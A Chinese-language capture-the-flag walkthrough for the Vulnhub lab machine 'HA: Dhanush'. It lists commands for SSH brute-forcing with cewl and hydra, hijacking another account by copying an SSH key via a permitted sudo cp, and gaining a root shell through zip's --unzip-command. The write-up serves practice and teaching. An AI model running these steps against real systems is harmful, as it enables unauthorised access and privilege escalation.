其他分享
首页 > 其他分享> > HA: Dhanush Vulnhub Walkthrough

HA: Dhanush Vulnhub Walkthrough

作者:互联网

靶机下载链接:

https://www.vulnhub.com/entry/ha-dhanush,396/

主机扫描:

 

主机端口扫描:

 

HTTP目录爬取

使用dirb dirsearch 爬取均未发现可利用的目录

另外看到ssh端口开启了,进行网页爬取字典生成进行爆破

cewl http://10.10.202.147 -w dict.txt

 

╰─ hydra -L dict.txt 10.10.202.147 ssh -s 65345 -e nsr

 

 

尝试复制passwd文件提示无权限,用户sarangy用户才具有cp的root权限执行

这里的思路:

pinak用户生成秘钥对,然后使用过cp命令复制到用户sarang用户的.ssh目录为authorized_keys文件

然后ssh -i rsa_id 进行登录,尝试提权

 

sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys

 

 

zip命令提权

sudo zip /tmp/test.zip /home/sarang/test -T --unzip-command="sh -c /bin/bash"

 

 OVER!

标签:HA,Dhanush,zip,sarang,用户,爬取,Walkthrough,ssh,cp
来源: https://www.cnblogs.com/hack404/p/12132901.html